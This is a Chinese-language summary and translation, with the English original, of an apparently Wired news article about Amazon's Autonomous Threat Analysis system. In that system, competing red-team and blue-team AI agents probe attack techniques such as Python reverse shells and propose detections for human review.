亚马逊启用专业AI代理深挖系统漏洞

内容来源:https://www.wired.com/story/amazon-autonomous-threat-analysis/
内容总结:
【亚马逊推出AI安全防御系统ATA 以“机器速度”应对网络威胁】
随着生成式AI技术加速软件迭代,网络攻击手段也同步升级,科技企业安全团队面临前所未有的压力。本周一,亚马逊首次披露其内部研发的“自主威胁分析系统(ATA)”,该系统通过模拟攻防对抗,在黑客发动攻击前主动修补系统漏洞。
ATA系统诞生于2024年8月的亚马逊内部黑客马拉松,其创新之处在于采用多组专业AI智能体进行对抗演练:红队负责模拟攻击手法,蓝队专注构建防御方案。亚马逊首席安全官史蒂夫·施密特表示,传统安全检测存在覆盖范围有限、响应速度滞后等痛点,而ATA系统通过构建高保真测试环境,能够生成真实可验证的日志数据,从架构层面杜绝了AI“幻觉”问题。
在实际应用中,ATA系统曾针对黑客常用的Python“反向Shell”技术展开分析,数小时内即发现新型攻击变体,并生成有效性达100%的防御方案。值得注意的是,该系统采用“人在回路”机制,所有安全策略需经安全工程师确认后方可部署。
“AI承担了基础性工作,使团队能聚焦真正威胁。”施密特强调,ATA并非取代人类专家,而是将工程师从重复性劳动中解放,把专业智慧投入到最关键的复杂攻防场景中。据悉,亚马逊下一步计划将ATA应用于实时事件响应,以守护其庞大的数字生态系统。
中文翻译:
随着生成式人工智能提升软件开发速度,数字攻击者实施经济利益驱动或国家支持的黑客活动的能力也同步增强。这意味着科技企业安全团队需要审查的代码量达到前所未有的规模,同时还要应对恶意行为者带来的更大压力。亚马逊将于周一首次公开其内部系统"自主威胁分析"(ATA)的细节,该系统通过三大核心功能协助安全团队:主动识别平台漏洞、执行变体分析以快速定位同类缺陷、在攻击者发现前制定修复方案并建立检测机制。
ATA系统源于2024年8月亚马逊内部的黑客马拉松活动,据安全团队成员透露,它已发展成为关键防御工具。该系统的核心设计理念并非依赖单一AI代理进行全面安全测试,而是构建了多组专业AI代理,模拟攻防双方展开对抗——红队探索真实攻击技术在亚马逊系统中的应用路径,蓝队则针对性地提出需要人工审核的安全防护方案。
亚马逊首席安全官史蒂夫·施密特向《连线》杂志解释道:"初始概念旨在解决安全测试的两大瓶颈:一是有限人力难以覆盖所有软件和应用程序的检测盲区,二是传统检测体系无法跟上快速演变的威胁态势。若不能持续更新检测系统,就等于缺失了半个安防图景。"
为拓展ATA应用深度,亚马逊开发了高度仿真的"高保真"测试环境,这些环境能精准复现生产系统状态,使ATA既可采集真实遥测数据,又能生成有效分析指标。安全团队特别注重系统验证机制——红队代理在专用测试环境中执行可验证日志记录的真实攻击指令,蓝队代理则依据真实遥测数据验证防护方案有效性。每当代理生成新技术时,都会同步提取时间戳日志以确保主张准确性。
施密特指出,这种可验证架构既能降低误报率,又实现了"幻觉管控"。由于系统内置了可观测证据标准,"从架构层面就杜绝了幻觉产生的可能性"。AI代理的团队协作模式模仿了人类在安全测试中的合作机制,但亚马逊安全工程师迈克尔·莫兰强调,AI的独特价值在于能以前所未有的速度生成攻击技术变体组合,并同步提出修复方案,这种规模级分析若仅靠人力将耗时惊人。
作为2024年黑客马拉松首位提出ATA概念的工程师,莫兰表示:"现在我能带着创新技术构想直接验证'这个方案是否可行',系统已为我搭建好基础框架。这不仅让工作更有趣,更实现了机器级高速响应。"
施密特透露,ATA在特定攻击能力防御方面已展现卓越成效。以黑客常用的Python"反向Shell"技术为例,该系统在数小时内就发现了新型潜在攻击变体,并为亚马逊防御系统提出的检测方案实现100%有效拦截。
尽管ATA自主运作,但采用"人在回路"机制,所有对安全系统的实际修改都需经过人工确认。施密特坦言ATA无法替代人类高级别的精细安全测试,但他强调系统能将安全人员从日常威胁分析中的重复性劳动解放出来,使其更专注于复杂问题。
下一步,亚马逊计划将ATA应用于实时事件响应,以期在庞大系统遭受实际攻击时实现更快识别与修复。"AI在幕后处理繁重工作,当团队不再受误报分析困扰时,就能聚焦真实威胁。"施密特表示,"最令人鼓舞的是安全工程师们的积极反馈,他们视此为将才智部署在关键领域的绝佳机会。"
英文来源:
As generative AI pushes the speed of software development, it is also enhancing the ability of digital attackers to carry out financially motivated or state-backed hacks. This means that security teams at tech companies have more code than ever to review while dealing with even more pressure from bad actors. On Monday, Amazon will publish details for the first time of an internal system known as Autonomous Threat Analysis (ATA), which the company has been using to help its security teams proactively identify weaknesses in its platforms, perform variant analysis to quickly search for other, similar flaws, and then develop remediations and detection capabilities to plug holes before attackers find them.
ATA was born out of an internal Amazon hackathon in August 2024, and security team members say that it has grown into a crucial tool since then. The key concept underlying ATA is that it isn't a single AI agent developed to comprehensively conduct security testing and threat analysis. Instead, Amazon developed multiple specialized AI agents that compete against each other in two teams to rapidly investigate real attack techniques and different ways they could be used against Amazon's systems—and then propose security controls for human review.
“The initial concept was aimed to address a critical limitation in security testing—limited coverage and the challenge of keeping detection capabilities current in a rapidly evolving threat landscape," Steve Schmidt, Amazon's chief security officer, tells WIRED. “Limited coverage means you can’t get through all of the software or you can’t get to all of the applications because you just don’t have enough humans. And then it’s great to do an analysis of a set of software, but if you don’t keep the detection systems themselves up to date with the changes in the threat landscape, you’re missing half of the picture.”
As part of scaling its use of ATA, Amazon developed special “high-fidelity” testing environments that are deeply realistic reflections of Amazon's production systems, so ATA can both ingest and produce real telemetry for analysis.
The company's security teams also made a point to design ATA so every technique it employs, and detection capability it produces, is validated with real, automatic testing and system data. Red team agents that are working on finding attacks that could be used against Amazon's systems execute actual commands in ATA's special test environments that produce verifiable logs. Blue team, or defense-focused agents, use real telemetry to confirm whether the protections they are proposing are effective. And anytime an agent develops a novel technique, it also pulls time-stamped logs to prove that its claims are accurate.
This verifiability reduces false positives, Schmidt says, and acts as “hallucination management.” Because the system is built to demand certain standards of observable evidence, Schmidt claims that “hallucinations are architecturally impossible.”
The fact that ATA's specialized agents work together in teams—each lending its expertise toward a larger goal—mimics the way that humans collaborate in security testing and defense development. The difference that AI provides, says Amazon security engineer Michael Moran, is the power to rapidly generate new variations and combinations of offensive techniques and then propose remediations at a scale that is prohibitively time consuming for humans alone.
“I get to come in with all the novel techniques and say, ‘I wonder if this would work?’ And now I have an entire scaffolding and a lot of the base stuff is taken care of for me" in investigating it, says Moran, who was one of the engineers who originally proposed ATA at the 2024 hackathon. “It makes my job way more fun but it also enables everything to run at machine speed.”
Schmidt notes, too, that ATA has already been extremely effective at looking at particular attack capabilities and generating defenses. In one example, the system focused on Python “reverse shell” techniques, used by hackers to manipulate target devices into initiating a remote connection to the attacker's computer. Within hours, ATA had discovered new potential reverse shell tactics and proposed detections for Amazon's defense systems that proved to be 100 percent effective.
ATA does its work autonomously, but it uses the “human in the loop” methodology that requires input from a real person before actually implementing changes to Amazon's security systems. And Schmidt readily concedes that ATA is not a replacement for advanced, nuanced human security testing. Instead, he emphasizes that for the massive quantity of mundane, rote tasks involved in daily threat analysis, ATA gives human staff more time to work on complex problems.
The next step, he says, is to start using ATA in real-time incident response for faster identification and remediation in actual attacks on Amazon's massive systems.
“AI does the grunt work behind the scenes. When our team is freed up from analyzing false positives, they can focus on real threats,” Schmidt says. “I think the part that’s most positive about this is the reception of our security engineers, because they see this as an opportunity where their talent is deployed where it matters most."